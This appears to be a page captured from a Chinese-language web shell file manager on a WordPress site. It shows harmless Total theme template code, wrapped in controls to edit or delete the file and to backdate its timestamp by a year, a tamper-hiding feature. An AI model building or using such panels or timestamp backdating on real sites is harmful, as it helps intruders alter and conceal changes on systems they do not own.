文件操作 - page-single-layout.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/jimbrandstatter/public_html/wp-content/themes/Total/partials/page-single-layout.php
编辑文件内容
<?php use TotalTheme\Page\Single_Blocks as Blocks; /** * Single Page Layout. * * @package Total WordPress theme * @subpackage Partials * @version 5.10 */ defined( 'ABSPATH' ) || exit; if ( ! class_exists( 'TotalTheme\Page\Single_Blocks' ) ) { return; } ?> <article id="single-blocks" <?php Blocks::wrapper_class(); ?>><?php /** * Renders the single page blocks. * * @see inc/page/single-blocks.php * * If you wish to create a custom page design please see the "Dynamic Templates" documentation. * * @link https://total.wpexplorer.com/docs/dynamic-templates/ */ Blocks::render(); ?></article>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件